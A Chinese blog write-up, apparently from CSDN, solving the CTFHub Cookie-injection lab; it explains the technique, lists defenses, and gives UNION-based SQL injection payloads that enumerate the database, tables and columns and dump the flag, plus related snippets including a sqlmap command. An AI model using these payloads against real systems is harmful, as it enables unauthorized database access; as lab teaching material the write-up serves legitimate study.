CTFHub - Cookie注入

最新推荐文章于 2024-08-23 14:21:31 发布
最新推荐文章于 2024-08-23 14:21:31 发布
阅读量961 收藏 1
点赞数 4
分类专栏: CTFHub 文章标签: 网络安全 web安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/have_a_great_day/article/details/132792690
版权

目录

1. Cookie注入原理

2. 防御

3. 初始数据包内容

4. 获取数据库 库名称

5. 获取数据表 表名称

6. 获取列名

7. 获取数据

1. Cookie注入原理

  1. Cookie是存储在客户端浏览器中的小型文本文件,用于在服务器和客户端之间传递数据。应用程序常常使用Cookie来存储用户身份验证信息、会话标识符等敏感信息。
  2. Cookie注入的原理是攻击者通过修改或伪造Cookie中的值,将恶意的SQL代码注入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。

2. 防御

  • 对于从Cookie中提取的数据,始终进行充分的验证和过滤。
  • 使用参数化查询或预编译语句,而不是将用户提供的数据直接拼接到SQL查询中。
  • 最小化数据库用户的权限,确保数据库用户只能执行必要的操作。
  • 定期更新和修补应用程序以解决已知的安全漏洞。

3. 初始数据包内容

        SQL 注入点不止会出现在GET 参数或POST 参数中。其中Cookie注入则是一种特定的SQL注入形式,它利用了应用程序中使用的Cookie来进行攻击。

        此题为Cookie注入,所以我们利用bp进行抓包,找到数据包内的Cookie进行注入。

4. 获取数据库 库名称

        因为在CTFHub中web内SQL板块使用的是同一个数据库,所以列数是相同的。于是略过了判断列数的步骤,直接进入正题。

-2 union select 1,database()

5. 获取数据表 表名称

        使用的命令为:select * from 表名 where 限制条件。

        table_schema=database() :选择当前连接的数据库(sqli)中的所有表。

        group_concat:多个行的值合并为一个字符串的聚合函数。通俗的将就是回显出所有内容。

        可以发现此处没有【flag】表,取而代之的是【gzuhxxtsjy】,查看该表中的列名。

       【news】表一直都存在,所以第一想法先不考虑此表中的内容。

-2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()

6. 获取列名

        table_name='gzuhxxtsjy' :选择表名为【gzuhxxtsjy】的表的数据。

-2 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='gzuhxxtsjy'

7. 获取数据

-2 union select 1,nqxditexuo from gzuhxxtsjy

懒羊羊安全
关注
专栏目录
cookie注入CTFHUB靶场)
weixin_54105551的博客
09-10 1379
因为是cookie注入,所以我们就把注意放在cookie上,发现cookie后面有一个id=1,我们加一个单引号,看看会不会报错。发现报错,存在注入,我们可以查看一下他的字段数,发现等于3的时候会报错,说明字段数等于二,然后我们可以开始暴库了。我们先用BP对靶场进行抓包,然后将抓到的数据发送到repeater。尝试一下用gagawesmtx这个表。得到数据库sqli,然后开始爆表。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 834
CTFHUB SQL
CTFHUB-SQL注入-Cookie注入
weixin_68416970的博客
06-13 544
由于本关是cookie注入,就不浪费时间判断注入了,在该页面使用抓包,修改cookie后面,加上SQL语句,关掉burp抓包,就可以在题目页面显示结果了。
CTF WebCTFShow cookie泄露 Writeup(cookie泄露+URL解码)
最新发布
HEX9CF的技术博客
08-23 269
10cookie 只是一块饼干,不能存放任何隐私数据。
CTFHub-web(cookie注入)
m0_64444909的博客
04-11 5154
文章目录前言一、解题步骤二、使用步骤1.引入库2.读入数据总结 前言 一、解题步骤 (1)题目为cookie注入,我们首先先看一下cookie里的值有没有什么可以帮助我们思考的东西,id=i,很明显存在sql注入 (2)我们抓包来一步步的进行注入会更方便一些 1.我们用order by 语句来排序查询数据库有几行 (1,2都可以回显,直到3时无法回显,说明数据库有两行) id=1 order by 3; 2.接下来用联合查询语句union select语句来注入,从而判断显示位 (回显Data:2 正常)
CTFHUB-Cookie注入
Web学习之路
03-28 231
cookie
CTFHub技能树之WEBCookie注入
weixin_48799157的博客
03-20 1466
小白一个,如有错误请指正! 解法一:使用Burpsuite抓包 1.设置好Burpsuite后开始抓包 鼠标右键点击Send to Repeater 2.在Repeater界面发送数据包,发现可以看到返回的数据 3.可以发现Cookie的id可以传值,那我们通过Cookie进行注入 发现只有2个字段 有回显 有回显 没有回显 4.爆数据库 id=123 union select 1,database()# 5.爆表名 id=123 union select 1...
关于ctfhubcookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 704
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库sqli 然后查询数据库sqlmap -u "http://challenge-593b57751..
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1248
CTFHUB-WEB-SQL注入
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7204
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub | Cookie注入
尼泊罗河伯的博客
11-20 1795
根据网页显示内容提示,这题关于 Cookie 注入Cookie 注入和之前的注入手法一致,只不过需要在网页 Cookie 中修改其参数进行注入判断,那么直接打开工具 BurpSuite 对题目网站进行抓包。判断发现存在 Cookie 注入,接着判断字段数量,查看数据库位置和版本。使用注入常用流程爆库、爆表、爆数据。最后获得此题 flag 。
CTFhub Cookie注入
plant1234的博客
06-18 751
Cookie注入: 首先更具题目启动环境得到: 发现这是cookie注入,于是就利用bp抓包得到: 发现cookie 能传参数,于是传入: 2 1’ 1 and 1=1 1’ and 1=1# 1 and 1=2 得到: 可以看到在1’ ,1’ and 1=1 ,1 and 1=2 出没有回显 在1 and 1=1 处得到正确回显 所以是存在注入的 于是用语句查看字段数: 看到有3报错,所以有两个字段 于是去得到当前库名: 在得到表名: ...
CTFHubCookie注入
sGanYu
07-26 1879
手动注入 什么是cookie? 一种能够让网站服务器把少量数据储存到客户端的硬盘或内存,或是从客户端的硬盘读取数据的一种技术。当用户第一次访问页面的时候,服务器会生成一个用户特有的cookie,之后浏览器会根据用户设置的Cookie信息加载出内容,简单来说,cookie其实就是用户凭证的意思。 sqlmap注入 ...
sql注入预计完全体
2303_81631620的博客
04-04 887
Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站。
CTFHUB-WEB-SQL注入-cookie注入
weixin_43486981的博客
08-11 895
利用cookie值进行注入(把cookie值作为注入点) 题目: 靶机环境:可以看到页面没有可以输入的地方,根据题目,想到利用cookie值输入 使用burp suite抓包,在cookie值处输入注入语句,进行注入 查看回显位 求数据库名 求表名 求列名 求字段值,即可得到flag ...
CTFHub | Cookie
尼泊罗河伯的博客
09-29 2500
根据题目描述内容,这是一道关于浏览器 Cookie 的问题。网页提示只有管理员才能获得flag,那么可以通过修改 Cookie 值,将 0(False) 改为 1(True) 获得此题 flag 。
ctfhub cookie注入
Gi_iGablist的博客
11-01 134
首先,下载burpsuite,具体教程就不多说了,以下就用此工具完成这道题。 经过一系列步骤查找到数据库名:sqil,更换id:123+union++select+database(),2#, 查询表名 查询字段名 查询字段信息 拿到flag ...
CTFHUB Cookie
孙轶扬
04-09 1693
#题目 打开环境,会发现需要admin才能拿到旗子。检查cookie,发现name已经是admin。 #解题 使用控制台,curl命令的--cookie参数,传入cookie。 curl challenge-f83536cf678926e2.sandbox.ctfhub.com:10080/ --cookie "admin=1;" 如图,这样就能得到旗子了。 #反思 在得到正确答案之前,我进...
ctfhub sql注入cookie
06-06
题目内容大致为:“CTFHub SQL注入cookie”,需要进行进一步的解释和回答。 首先,“CTFHub”是指一种网络安全比赛形式,全称为“Capture The Flag Hub”,所以这道题是CTFHub比赛的一个部分。 其次,“SQL注入”是一种常见的网络攻击手段,通过在输入框等可输入的地方输入特定的数据库操作语句,来实现对数据库的非授权操作。 最后,“cookie”是指在网站上存储用户信息的一种机制,可以通过注入SQL语句来获取其中的敏感信息,如账号密码等。 综上,这道题的意思是在一个CTFHub比赛的环境下,需要使用SQL注入来获取网站的cookie信息。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值